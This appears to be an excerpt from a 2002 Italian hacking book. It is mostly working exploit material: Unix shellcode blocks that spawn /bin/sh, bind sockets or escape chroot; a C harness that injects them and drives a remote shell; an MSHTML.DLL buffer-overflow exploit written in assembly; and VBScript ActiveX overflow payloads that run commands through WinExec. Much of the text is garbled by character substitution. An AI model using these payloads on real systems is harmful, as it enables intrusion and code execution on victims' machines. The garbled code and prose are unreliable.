KOxb,Ox0BK /- mo?b P0x0B,Jcl -/
KOxB,Oxc0K /- xorl Jeax,Jeax -/
KOxb0OxBfK /- mo?b P0xBf,Jal -/
KOxCMK /- decl Jecx -/
KOxcdOxD0K /- int P0xD0 -/
KOxC,K /- incl Jecx -/
KOxe!Oxf(K /- loo* QbindsckcodeN(B$ -/
;
Hdefine 2I3F689@7:5726 C(
Hdefine AI3F689@7:5726 0(
Hendif
+eOS/x%& codes, file: x%&--eos
/-
s>scall Jeax stack
----------- ---- ---------------------------------------------------------------
exec? x0Bf ret,anum,,-$.-$*athK/bin//shK/,0
exec? x0Bf ret,anumB,-$.-$*athK/bin//shK,-$a,K-cK,-$a!cmd/,0
-/
Hif defined(LD() ++ defined(A476)
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
char shellcode./ /- !" b>tes -/
KOxB,Oxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx(DKK//shK /- *ushl P0x(D#B!f!f -/
KOx(DKK/binK /- *ushl P0x(e(M(!!f -/
KOx"CK /- *ushl Jes* -/
KOxDMOxeBK /- mo?l Jes*,Jebx -/
KOx"0K /- *ushl Jeax -/
KOx"BK /- *ushl Jebx -/
KOx(aOx0,K /- *ushb P0x0, -/
KOx"0K /- *ushl Jeax -/
KOxb0Oxa!K /- mo?b P0xa!,Jal -/
KOxcdOx!"K /- int P0x!" -/
;
char cmdshellcode./ /- CCNcmdlen b>tes -/
KOxebOx!"K /- %m* QcmdshellcodeNBM$ -/
KOx"MK /- *o*l Jecx -/
KOxB,Oxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx(DKK//shK /- *ushl P0x(D#B!f!f -/
KOx(DKK/binK /- *ushl P0x(e(M(!!f -/
KOxDMOxeBK /- mo?l Jes*,Jebx -/
KOx"0K /- *ushl Jeax -/
KOx((Ox(DKK-cK /- *ushE P0x(B!d -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOx",K /- *ushl Jecx -/
KOx"#K /- *ushl Jedi -/
KOx"BK /- *ushl Jebx -/
KOxDMOxeBK /- mo?l Jes*,Jebx -/
KOx"0K /- *ushl Jeax -/
KOx"BK /- *ushl Jebx -/
KOx(aOx0BK /- *ushb P0x0B -/
KOx"0K /- *ushl Jeax -/
KOxb0Oxa!K /- mo?b P0xa!,Jal -/
KOxcdOx!"K /- int P0x!" -/
KOxeDOxd(OxffOxffOxffK /- call QcmdshellcodeN!$ -/
/- command -/
;
char %um*./
KOxDbOxcCK /- mo?l Jes*,Jeax -/
KOxcBK /- ret -/
;
Hendif
Pro.ramma d/esempio le.a#i all/uso dei codici
012 asmcodes1h
Hifndef 16;87F46'U
Hdefine 16;87F46'U
Hinclude Kmi*s-irixK
Hinclude Ks*arc-solarisK
Hinclude K*arisc-h*uxK
Hinclude K*oEer*c-aixK
Hinclude Kal*ha-ultrixK
Hinclude KxD(-beosK
Hinclude KxD(-bsdK
Hinclude KxD(-linuxK
Hinclude KxD(-solarisK
Hinclude KxD(-scoK
t>*edef struct)char -n;char -c;0asmcodes't.M/;
asmcodes't asmcodes)
Hif defined(1IL) WW ( defined(LD() ++ ( defined(67=1:I6) WW defined(687) ) )
) Ks>scallcodeK, s>scallcode 0,
Helse
) KK, 3<== 0,
Hendif
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
) KshellcodeK, shellcode 0,
) KcmdshellcodeK, cmdshellcode 0,
Hif Tdefined(A476) ++ Tdefined(<=5:IL)
Hif defined(67=1:I6) WW defined(687) WW defined(=I3<L) WW defined(A6F)
) KsetuidcodeK, setuidcode 0,
Hendif
Hif defined(U@<L)
) KsetresuidcodeK, setresuidcode 0,
Hendif
Hif defined(I:IL) WW defined(1IL)
) KsetreuidcodeK, setreuidcode 0,
Hendif
) KchrootcodeK, chrootcode 0,
Hif Tdefined(7@4364:S4:)
) KfindsckcodeK, findsckcode 0,
Helse
) KK, 3<== 0,
Hendif
Hif Tdefined(687)
) KbindsckcodeK, bindsckcode 0
Helse
) KK, 3<== 0,
Hendif
Helse
) KK, 3<== 0,
) KK, 3<== 0,
) KK, 3<== 0,
) KK, 3<== 0
Hendif
0;
Hif defined(A476) WW defined(<=5:IL)
Hdefine 2I3F689@7:5726 -,
Hdefine AI3F689@7:5726 -,
Hdefine uslee*(a) slee*(,)
Hendif
Hdefine is(flag) (flags+(,QQflag))
Hdefine block(flag) (flags+(,QQflag))
Hdefine code(flag) asmcodes.flag/.c
Hdefine 6X681== 0
Hdefine 6U4== ,
Hdefine 8;F !
Hdefine 8:4F B
Hdefine 8U:775 C
Hdefine 2I3F "
Hdefine AI3F (
Hdefine ':4;754 M
t>*edef struct)char state;char -folloE;int flag;0*block't.C/;
*block't tab)
) Y@Y, K86:2AK, (,QQ8:4F) 0,
) Y:Y, K862AK , (,QQ8U:775) 0,
) Y2Y, K86K , (,QQ2I3F)W(,QQ':4;754) 0,
) YAY, K86K , (,QQAI3F)W(,QQ':4;754) 0
0;
int *arseblocks(char -b))
char c,s;int i,flag0;s(strlen(b),);
Ehile((c-bNN)++-b))
for(i0;iQC;iNN) if(ctab.i/.state) break;
if(iC) return(-,);
if(strchr(tab.i/.folloE,-b)) flagWtab.i/.flag; else return(-,);
0
if(cY6Y) flagW(,QQ6U4==);
else if(cY8Y) flagW(,QQ8;F); else return(-,);
return(flag);
0
Hendif
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
013 asmcodes1c
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH unix asmcodes testing facilit> H-/
/- this code *ro?ides the ca*abilit> of testing different assembl> code -/
/- blocks in *roof of conce*t codes -/
/- -/
/- com*ilationG -/
/- (g)cc asmcodes.c -F6X654; -F@:784667: .-FS4:6I73/ .-lnsl -lsocket/ -/
/- *latformsG filesG -/
/- -FI:IL -F;I@6 ; mi*s-irix -/
/- -F67=1:I6 -F6@1:8 ; s*arc-solaris -/
/- -FU@<L -F@1:I68 ; *arisc-h*ux -/
/- -F1IL -F@7V4:@8 -FSC,W-FSC!W-FSCB ; *oEer*c-aix -/
/- -F<=5:IL -F1=@U1 ; al*ha-ultrix -/
/- -F67=1:I6 -FLD( ; xD(-solaris -/
/- -FA476 -FLD( ; xD(-beos -/
/- -F=I3<L -FLD( ; xD(-linux -/
/- -F7@43A6F -FLD( ; xD(-bsd -/
/- -F2:44A6F -FLD( ; xD(-bsd -/
/- -F345A6F -FLD( ; xD(-bsd -/
/- -F7@4364:S4: -FLD( ; xD(-sco -/
/- -F<3ILV1:4 -FLD( ; xD(-sco -/

Hinclude Qs>s/t>*es.h$
Hinclude Qs>s/socket.h$
Hif defined(1IL)
Hinclude Qs>s/select.h$
Hendif
Hinclude Qs>s/time.h$
Hinclude Qnetinet/in.h$
Hinclude Qnetdb.h$
Hinclude Qunistd.h$
Hinclude Qstdio.h$
Hinclude Qerrno.h$
Hinclude K'asmcodes.hK
int main(int argc,char --arg?))
char buffer.,0!C/,-b,-cmdKidK;
int i,c,n,flags-,,*ort,!BC,sck;
struct hostent -h*;
struct sockaddr'in adr;
*rintf(Kco*>right =165 651I4 72 F4=I:I<; feb !00, *oland //lsd-*l.net/OnK);
*rintf(Kunix asmcodes testing facilit>OnOnK);
Ehile((cgeto*t(argc,arg?,KbGcG*GK))T-,))
sEitch(c))
case YbYG flags*arseblocks(o*targ);break;
case YcYG cmdo*targ;break;
case Y*YG *ortatoi(o*targ);break;
0
0
if(flags-,))
*rintf(KusageG Js -b buffer .-* *ort/ .-c OKcmdOK/OnJsK,arg?.0/,
K Ehere the buffer is com*osed of one of the folloEing blocksGOnK
K 6 interacti?e shellOnK
K 8 single command (-c OKcmdOK, or *redefined OKidOK)OnK
K @ restore *ri?ilegesOnK
K : esca*e chroot %ailOnK
K 2 find socket (-* *ort, or default,!BC)OnK
K A bind socket (same as for 2)OnOnK
K ?alid blocks combinationsGOnK
K 6 @6 :6 @:6 26 A6 @26 @A6 :26 :A6 @:26 @:A6OnK
K 8 @8 :8 @:8 28 A8 @28 @A8 :28 :A8 @:28 @:A8OnOnK
K blocks im*lemented on this *latformGOn K
);
for(i,;iQM;iNN) *rintf(KJs K,asmcodes.i/.nZasmcodes.i/.nGKK);
*rintf(KOnOn exam*leG Js -b @:26 -* ,,,!OnK,arg?.0/);
exit(-,);
0
/-
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
- if the find or bind codes are to be tested run sim*le netEork daemon
- simulating a ?ulnerable a**lication. the simulation is done b> the means
- of reading instructions stream from the netEork and then executing it.
-/
if(is(':4;754)))
if(Tfork()))
scksocket(12'I345,6789'65:41;,0);
adr.sin'famil>12'I345;
adr.sin'*orthtons(*ort);
adr.sin'addr.s'addrhtonl(I31FF:'13X);
i,;
setsocko*t(sck,67='678945,67':4<641FF:,(?oid-)+i,si&eof(i));
if(bind(sck,(struct sockaddr-)+adr,si&eof(struct sockaddr'in))Q0))
*error(KerrorK);exit(-,);
0
listen(sck,,);
if((iacce*t(sck,(struct sockaddr-)0,(int-)0))-,) exit(-,);
close(sck);scki;
read(sck,buffer,si&eof(buffer));
uslee*("00000);
if(block(AI3F)) close(sck);
Hif defined(1IL)
)
int %um*.!/)(int)buffer,-((int-)+mainN,)0;
slee*(,);
((-(?oid (-)())%um*)());
0
Helse
uslee*(,00000);
((-(?oid (-)())buffer)());
Hendif
exit(-,);
0
slee*(,);
0
/-
- if this is remote code test, connect to the remote ser?er, Ehich
- simulates ?ulnerable a*lication.
-/
if(is(':4;754)))
scksocket(12'I345,6789'65:41;,0);
adr.sin'famil>12'I345;
adr.sin'*orthtons(*ort);
if((adr.sin'addr.s'addrinet'addr(K,!#.0.0.,K))-,))
if((h*gethostb>name(K,!#.0.0.,K))3<==))
errno41FF:3751S1I=;*error(KerrorK);exit(-,);
0
memc*>(+adr.sin'addr.s'addr,h*-$h'addr,C);
0
if(connect(sck,(struct sockaddr-)+adr,si&eof(struct sockaddr'in))Q0))
*error(KerrorK);exit(-,);
0
0
/-
- se*arate code *ieces are combined into one block in the target buffer.
- for the findsckcode the local *ort of the connection established Eith
- a K?ulnerableK ser?er must be obtained. for bindsckcode the number
- of *ort to Ehich the listening socket is to be bound must be s*ecified.
-/
bbuffer;
if(code(6X681==)T3<==))
for(i0;iQstrlen(code(6X681==));iNN) -bNNcode(6X681==).i/;
0
if(block(8:4F)))
for(i0;iQstrlen(code(8:4F));iNN) -bNNcode(8:4F).i/;
0
if(block(8U:775)))
for(i0;iQstrlen(code(8U:775));iNN) -bNNcode(8U:775).i/;
0
if(block(2I3F)))
isi&eof(struct sockaddr'in);
if(getsockname(sck,(struct sockaddr-)+adr,+i)-,))
struct)unsigned int maxlen;unsigned int len;char -buf;0nb;
ioctl(sck,((Y6YQQD)W!),KsockmodK);
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
nb.maxlen0xffff;
nb.lensi&eof(struct sockaddr'in);;
nb.buf(char-)+adr;
ioctl(sck,((Y5YQQD)W,CC),+nb);
0
nntohs(adr.sin'*ort);
code(2I3F).2I3F689@7:5726N0/(unsigned char)((n$$D)+0xff);
code(2I3F).2I3F689@7:5726N,/(unsigned char)(n+0xff);
for(i0;iQstrlen(code(2I3F));iNN) -bNNcode(2I3F).i/;
0
if(block(AI3F)))
n*ort;
code(AI3F).AI3F689@7:5726N0/(unsigned char)((n$$D)+0xff);
code(AI3F).AI3F689@7:5726N,/(unsigned char)(n+0xff);
for(i0;iQstrlen(code(AI3F));iNN) -bNNcode(AI3F).i/;
0
if(block(6U4==)))
for(i0;iQstrlen(code(6U4==));iNN) -bNNcode(6U4==).i/;
0
if(block(8;F)))
for(i0;iQstrlen(code(8;F));iNN) -bNNcode(8;F).i/;
for(i0;iQstrlen(cmd);iNN) -bNNcmd.i/;
0
-b0;
/-
- the *ortion of code simulating a K?ulnerabilit>K in a *rogram, Ehich
- is to be ex*loited locall>
-/
if(Tis(':4;754)))
Hif defined(1IL)
)
int %um*.!/)(int)+buffer,-((int-)+mainN,)0;
slee*(,);
((-(?oid (-)())%um*)());
0
Helse
Hif defined(<=5:IL)
((-(?oid (-)())(unsigned long long)strdu*(buffer))());
Helse
uslee*(,00000);
((-(?oid (-)())buffer)());
Hendif
Hendif
exit(-,);
0
/-
- for remote test, send buffer ?ia netEork socket to a sim*le daemon.
- do bind reconnection Ehereas needed. if remote shell gets executed,
- read commands from user, feed them to the shell and shoE their results.
-/
Erite(sck,buffer,strlen(buffer)N,);
if(block(AI3F)))
close(sck);
slee*(!);
scksocket(12'I345,6789'65:41;,0);
adr.sin'*orthtons(n);
if(connect(sck,(struct sockaddr-)+adr,si&eof(struct sockaddr'in))Q0))
*error(KerrorK);exit(-,);
0
0
if(block(2I3F)))
slee*(,);
0
Erite(sck,Kuname -aOnK,M);
Ehile(,))
fd'set fds;
2F'[4:7(+fds);
2F'645(0,+fds);
2F'645(sck,+fds);
if(select(2F'6456I[4,+fds,3<==,3<==,3<==)))
int cnt;
char buf.,0!C/;
if(2F'I6645(0,+fds)))
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
if((cntread(0,buf,,0!C))Q,))
if(errno4V7<=FA=789WWerrno41I1I3) continue;
else break;
0
Erite(sck,buf,cnt);
0
if(2F'I6645(sck,+fds)))
if((cntread(sck,buf,,0!C))Q,))
if(errno4V7<=FA=789WWerrno41I1I3) continue;
else break;
0
Erite(,,buf,cnt);
0
0
0
exit(0);
0
Buffer Overflow in MSHTML.DLL
Indovinate dove si rova un buffer overflow 2
3entro alla 3LL che gestisce l’interprete Micrsoft di 45ML ovvero la 3LL M&45ML.3LL.
In altre parole se viene fornito all’interprete uno statement del tipo (
Qembed srcKfilename.1111111111Qun certo numero di Y1Y$K$
l’indirizzo di ritorno viene sovrascritto dalla translazione in NI+63) di 1111 ovvero
7*89778977.
Il buffer overflow avviene quando l’interprete cerca di concatenare l’estensione del file con
K6oftEareO;icrosoftOInternet 4x*lorerO4mbed4xtn5o8lsid;a**ing7?errideOK
tramite la funzione + wcscat./.
)siste un altro problema nel sistema di validazione e precisamente in quello che controlla se
esiste un estensione.
)sistono comqunue tre problemi specifici nella scritura dell’e*ploit e precisaente (
9 5utti i dati vengono convertiti in NI+63) e cioè le 1 vengono convertite in 7*7789.
:. L’indirizzo della shell code potrebbe essere differente in base al numero di finestre aperte
; +i sono differenti offset di )I% salvati all’interno dello stac- quando la versione di Internet
)*plorer è precedente e posteriore alla I)<.<&%:.
Il primo problema ci insegna a b=passarlo +ode,ed ovvero è sufficiente passare gi$ lo shell
code in NI+63) per evitare la routine di conversione.
Il secondo problema è b=passabile facendo si che l’indirizzo che andiamo a sovrascrivere è di
fatto di una routine presente in una 3LL in memoria a cui sar$ possibile saltare indietro
mediante )>% o )&%.
1bbiamo trovato un istruzione ?0mp esp? .FF)8/ in tutte le versioni di -ernel;:.dll e anche
dentro ad una versione di msvcrt.dll .#.97."@:8.7/.
'uesta versione di 3LL non dipende da Internet )*plorer ed è presente in qualsiasi
installazione Aindows.
Il terzo problema è possibile b=passarlo mediante la sovrascrittura dei vari )I%s salvati nello
stac-B usando un certo numero di noops e
call xxxx
...
xxxxG
*o* eb*
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
&e vi ricordate quando abbiamo parlato dei buffer overflow uno dei problemi era quello dato
dalla presenza di 7.
'ui non dobbiamo preoccuparci in quanto il tutto è gi$ fornito come NI+63).
'ui a seguito è riportato una shel code con degli effetti visuali.
;
; matrix.asm - source code for matrix.htm
;
; buildG
; tasm matrix.asm /m!
; tlink matrix.ob%, matrix.htm /t /B
;
; 1uthorsG
; 4::7:G bug disco?er>
; B1@1B1G idea and coding
; 722linerG matrix effects and undocumented VindoEs 1@I
;
; 5hanx to 1ndre> 9olishak for indirect es* %um* idea
;
; >ou can obtain matrix screensa?er from
; htt*G//EEE.securit>.nno?.ru/matrix
;
;
; ei*%m*G o?erErites sa?ed 4I@ for all ?ersions of
; mshtml.dll
; es*%m*G gets control after %m* es* and calls code,
; code,G restores 4I@ from stack after call to eb*
; does some actions and %um*s to code!
; code!G does the rest of actions
data* eRu (Fata5ableN0D0h)
h9ernelB! eRu =oad=-data*
c8ur eRu 6tring5able-data*
6et88U eRu 6tring5ableNC-data*
Iet6U eRu 6tring5ableND-data*
6lee* eRu 6tring5ableN,!-data*
Vrite8 eRu 6tring5ableN,(-data*
1lloc8 eRu 6tring5ableN!0-data*
6et8F; eRu 6tring5ableN!C-data*
6et851 eRu 6tring5ableN!D-data*
6et88I eRu 6tring5ableNB!-data*
Vin4 eRu 6tring5ableNB(-data*
4xit@ eRu 6tring5ableNC0-data*
h6td7ut eRu 6tring5ableNCD-data*
dE7ld;ode eRu c8ur
con8ur eRu 6tring5ableN"!-data*
cls eRu 6tring5ableN"(-data*
FV3um8har eRu 6tring5ableN(0-data*
:egU9 eRu user-data*
BD(
'faked segment *ara *ublic Y87F4Y useB!
assume csG'faked
startG
'faked ends
'main segment *ara *ublic YF151Y useB!
assume csG'main
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
*refixG
begin db 0ffh,0feh ;<nicode *refix
db KQK,0,KeK,0,KmK,0,KbK,0,KeK,0,KdK,0,0dh,0
db KsK,0,KrK,0,KcK,0,KK,0,BC,0
db KhK,0,KtK,0,KtK,0,K*K,0,KGK,0,K/K,0,K/K,0
db KEK,0,KEK,0,KEK,0,K.K,0
db
KsK,0,KeK,0,KcK,0,KuK,0,KrK,0,KiK,0,KtK,0,K>K,0,K.K,0
db KnK,0,KnK,0,KoK,0,K?K,0,K.K,0,KrK,0,KuK,0
db K/K,0,KfK,0,KiK,0,KlK,0,KeK,0,KsK,0,K/K,0
db KiK,0,KeK,0,KbK,0,KoK,0,K/K,0,KLK,0
db KT(c)B1@1B1K
db !! du*(0M0h)
code,G
*o* eb*
mo? es*,ebx
xor eax,eax
dataoffset Fata5able - code!
eb*diff D0h N dataoffset
mo? ax,eb*diff
add eb*,eax ;eb* *oints to data

lea eax,.eb*Nuser-data*/
*ush eax
mo? ebx,.eb*N=oad=-data*/
mo? eax,.ebx/
mo? .eb*N=oad=-data*/,eax
call eax ;=oad=ibrar>1(KuserB!.dllK)
lea ebx,.eb*Nreg-data*/
*ush ebx
*ush eax
mo? ebx,.eb*NIet@1-data*/
mo? eax,.ebx/
mo? .eb*NIet@1-data*/,eax
call eax ;Iet@roc1ddress(.,K:egisterUot9e>K)
mo? .eb*N:egU9/,eax
lea edi,.eb*Nrhk-data*/
mo?&x esi,b>te *tr.edi/
=oo*Uotke>G
inc edi
xor eax,eax
mo? al,.edi/
*ush eax
inc edi
mo? al,.edi/
*ush eax
inc edi
mo? al,.edi/
*ush eax
xor eax,eax
*ush eax
call .eb*N:egU9/
dec esi
or esi,esi
%n& =oo*Uot9e>

lea eax,.eb*N6tring5able-data*/ ;string KkernelB!.dllK
*ush eax
call .eb*N=oad=-data*/ ;=oad=ibrar>1(KkernelB!.dllK)
mo? .eb*Nh9ernelB!/,eax ;h9ernelB!
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
lea eax, .eb*N6et88U/
mo? .eb*Nc8ur/,eax ;-c8ur 6et88U
lea edi,.eb*Nfuncnum-data*/
mo?&x esi,b>te *tr.edi/ ;esifuncnum
inc edi
=oo*:esol?eG
*ush edi
*ush dEord *tr .eb*NUkernelB!/
call .eb*NIet@1-data*/ ;Iet@roc1ddress(edi)
mo? ebx,.eb*Nc8ur/
mo? .ebx/,eax ;sa?e func address
xor ecx,ecx
mo? cl,C
add ebx,ecx
mo? .eb*Nc8ur/,ebx ;c8urNC
not ecx
xor eax,eax
re*n& scasb ;find O0
dec esi
or esi,esi
%n& =oo*:esol?e

call .eb*N1lloc8/ ;1lloc8onsole()
*ush eax ;non&ero if succeed
xor eax,eax
*ush eax
call .eb*N6et88U/ ;6et8onsole8trlUandler(3<==,5:<4)
xor eax,eax
not eax
sub al,01h
*ush eax
call .eb*NIet6U/ ;Iet6tdUandle(65F'7<5@<5'U13F=4)
mo? .eb*Nh6td7ut/,eax ;h6td7ut
lea eax,.eb*NdE7ld;ode/
*ush eax
xor ebx,ebx
inc ebx
*ush ebx
*ush dEord *tr .eb*Nh6td7ut/
call .eb*N6et8F;/ ;6et8onsoleFis*la>;ode(h6td7ut, ,,
+dE7ld;ode)
xor ebx,ebx
mo? bl,01h
*ush ebx
*ush dEord *tr .eb*Nh6td7ut/
call .eb*N6et851/
;6et8onsole5ext1ttribute(h6td7ut,27:4I:7<3F'I35436I5XW
27:4I:7<3F'I:443)
xor ebx,ebx
mo? .eb*N8on8urNC/,ebx ;8on8ur.bSisible ,00
mo? bl, ,00
mo? .eb*N8on8ur/,ebx ;8on8ur.dE6i&e 0
lea eax, .eb*N8on8ur/
*ush eax
*ush dEord *tr .eb*Nh6td7ut/
call .eb*N6et88I/ ;6et8onsole8ursorInfo(hstd7ut,+8on8ur)
xor eax,eax
mo? ax,,000
*ush eax
call.eb*N6lee*/ ;6lee*(,000);
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
xor ebx,ebx
mo? bl, string-data*
mo? eax,eb*
add eax,ebx
mo? .eb*Nc8ur/,eax ;c8ur string
mo? eax,eb*
mo? bx,data*-em*t>'string
sub eax,ebx
mo? .eb*Ncls/,eax ;set address of em*t>'string
=77@,G ;do do
xor eax,eax
*ush eax
lea ebx,.eb*NFV3um8har/
*ush ebx
inc eax
*ush eax
mo? eax,.eb*Nc8ur/
*ush eax
*ush dEord *tr .eb*Nh6td7ut/
call .eb*NVrite8/
;Vrite8onsole(h6td7ut,(?oid-)c8ur,,,+FV3um8har,3<==);
xor eax,eax
mo? al,,00
mo? ecx,.eb*Nc8ur/
mo? bl,.ecx/
sub bl,!0
%n& 3,
mo? ax,C00
3,G mo? bl,.ecx/
sub bl,D
%n& 3!
mo? ax,!,00
3!G *ush eax
call .eb*N6lee*/ ;6lee*((-c8urY Y)ZC00G(-c8urYObY)Z
!,00G,00)
mo? ecx,.eb*Nc8ur/
inc ecx
mo? .eb*Nc8ur/,ecx ;NNc8ur
mo? bl,.ecx/
sub bl,M
%n& =77@, ;Ehile(-c8urTYOtY);
call .eb*Ncls/
mo? ecx,.eb*Nc8ur/
inc ecx
mo? .eb*Nc8ur/,ecx ;NNc8ur
mo? bl,.ecx/
sub bl,001h
%n& =77@, ;Ehile(-c8urTYOnY);
inc ecx
xor eax,eax
*ush eax
lea ebx,.eb*NFV3um8har/
*ush ebx
mo? al,,D
*ush eax
*ush ecx
*ush dEord *tr .eb*Nh6td7ut/
%m* code!

codelength P - begin
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
neednoo*s ,dCh - codelength
db neednoo*s du*(0M0h)
ei*%m*G
dd #D0!Ce0!h
dd #D0!Ce0!h
dd #D0!Ce0!h
dd #D0!Ce0!h
dE M0M0h
dd #D0!Ce0!h ;4I@ for I4 Q ""6@!
es*%m*G
db ,D du*(0M0h)
xor eax,eax ;46@ comes here
mo? ax,0,#0h
mo? ebx,es*
sub ebx,eax
call ebx
code!G
call .eb*NVrite8/
xor eax,eax
mo? ax,C000
*ush eax
call .eb*N6lee*/
call .eb*Ncls/
lea eax,.eb*Ncmdexe-data*/
*ush eax
*ush eax
call .eb*NVin4/
xor eax,eax
*ush eax
call .eb*N4xit@/

em*t>'stringG
; some code can be *asted here
xor eax,eax
mo? ax,,000
*ush eax
call .eb*N6lee*/ ;6lee*(,000)
xor eax,eax
*ush eax
lea ebx,.eb*NFV3um8har/
*ush ebx
mo? al,B0
*ush eax
lea eax,.eb*Nem*t>-data*/
*ush eax
*ush dEord *tr .eb*Nh6td7ut/
call .eb*NVrite8/
ret

Fata5ableG
=oad= dd #D0BB0d0h ;=oad=ibrar>1 im*ort table entr>
Iet@1 dd #D0BB0cch ;Iet@roc1ddress im*ort table entr>
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
6tring5ableG
db KkernelB!.dllK,0
funcnum db ,0
db K6et8onsole8trlUandlerK,0
db KIet6tdUandleK,0
db K6lee*K,0
db KVrite8onsole1K,0
db K1lloc8onsoleK,0
db K6et8onsoleFis*la>;odeK,0
db K6et8onsole5ext1ttributeK,0
db K6et8onsole8ursorInfoK,0
db KVin4xecK,0
db K4xit@rocessK,0
user db KuserB!.dllK,0
reg db K:egisterUot9e>K,0
cmdexe db Kcmd.exeK,0
rhk db "
db M,,,,00,0,bh,,,,0,,,B,,,,0!,0"dh,D,,0B,B,!,,0C
em*t> db 00dh,!D du*(0!0h),00dh,0
string db 00dh,K Vake <*, 3eo...K,00dh,00Mh,0
db 00dh,K 5he ;atrix has >ou...K,00dh,00Mh,0
db 00dh,K 2olloE the Vhite
:abbit.K,00dh,00Dh,00Mh,00ah,0
db 00dh,K 9nock, knock...K,00dh,0

*adding db B!
suffixG
db BC,0,K$K,0,00ah
co*> db K(c) !00! b> B1@1B1, 4::or, 722=inerK
'main ends
end start
Buffers Overflow a vari componenti di Windows
)sistono diversi 6+! in ambiente AIN36A& che possiedono dei bugs che li rendono
suscettibili di buffer overflow.
1crobat +ontrol for 1ctive! C %3F.6+! .v9.;.9""/
&etupctl 9.7 5=pe Librar= C &)5%+5L.3LL .v9B 9B 7B #/
)D)36E 6L) +ontrol module C )D)36E.6+! .v9.9.9.F</
M&N 1ctive! &etup >>& +ontrol C &)5%>>&.6+! .v8.F9.7.97/
hhopen 6L) +ontrol Module C 446%)N.6+! .v9B 7B 7B 9/
,egAiz+trl 9.7 5=pe Librar= C ,)EAIG+.3LL .v;B 7B 7B 7/
I vari e*ploits sono relativi a codici 45MLB quindi fate vuoi a fantasia.
Negli esempi qello che si esegue è il solito calcolatore.
P,)
Hob0ect classidI?clsid(+1"1@F"7C:"73C99+FC1:83C888<<;<87777?
idI?pdf?JHKob0ectJ
Hscript languageI?L>script?JHMCC
msgbo*.?1dobe 1crobat 6+! >uffer 6verrun? N +hr.97/ N ?Aritten b= &hane
4ird?/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
e*pstr I
?1111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
111111111111111111111111?
e*pstr I e*pstr N +hr.:;</ O1ddress in &4)LL;:B Ain@" .FF37;<)>/ of PM% )&%
e*pstr I e*pstr N +hr.<;/ ODou ma= need to use a different address
e*pstr I e*pstr N +hr.:7"/
e*pstr I e*pstr N +hr.9:F/
O&tac- is slightl= trashedB but N6%s fi* it up o-
e*pstr I e*pstr N +hr.988/ N +hr.988/ N +hr.988/ N +hr.988/ N +hr.988/
OM6L )3IB )&%
e*pstr I e*pstr N +hr.9;@/ N +hr.:<:/
O133 )3IB 9@ .&ize of code/
e*pstr I e*pstr N +hr.9;9/ N +hr.9@@/ N +hr.:</
O%&4 )1! .Aindow &t=le )1! I 9/
e*pstr I e*pstr N +hr."7/
O%&4 )3I .1ddress of command line/
e*pstr I e*pstr N +hr."F/
OM6L )3!B >FF17@#7 .Ain)*ecB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.@#/ N +hr.@/ N +hr.:<7/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O!6, )1!B )1!
e*pstr I e*pstr N +hr.<9/ N +hr.9@:/
O%&4 )1!
e*pstr I e*pstr N +hr."7/
OM6L )3!B >FF"38+1 .)*it%rocessB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O,eplace with an= command N 7 .automaticall= appended/
e*pstr I e*pstr N ?+1L+.)!)?
O+all e*ploitable method
pdf.setview.e*pstr/
CCJHKscriptJ
S!4UPC4$
Hob0ect classidI?clsid(FF:1F>7)C733"C9939C>3#)C771177>@:1F9? id I
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
?setupctl?J
HKob0ectJ
Hscript languageI?vbscript?JHMCC
msgbo*.?&etupctl 9.7 5=pe Librar= >uffer 6verrun? N +hr.97/ N ?Aritten b=
&hane 4ird?/
e*pstrI?11111111111111111111111111111111
111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
111111111111111?
e*pstr I e*pstr N +hr.:;</ O1ddress in &4)LL;:B Ain@" .FF37;<)>/ of PM% )&%
e*pstr I e*pstr N +hr.<;/ ODou ma= need to use a different address
e*pstr I e*pstr N +hr.:7"/
e*pstr I e*pstr N +hr.9:F/
ON6% for debugging purposes
e*pstr I e*pstr N +hr.988/
OM6L )3IB )&%
e*pstr I e*pstr N +hr.9;@/ N +hr.:<:/
O133 )3IB 9@h .&ize of code/
e*pstr I e*pstr N +hr.9;9/ N +hr.9@@/ N +hr.:</
O%&4 )1! .Aindow &t=le )1! I 89898989/
e*pstr I e*pstr N +hr."7/
O%&4 )3I .1ddress of command line/
e*pstr I e*pstr N +hr."F/
OM6L )3!B >FF17@#7 .Ain)*ecB Ain@"/
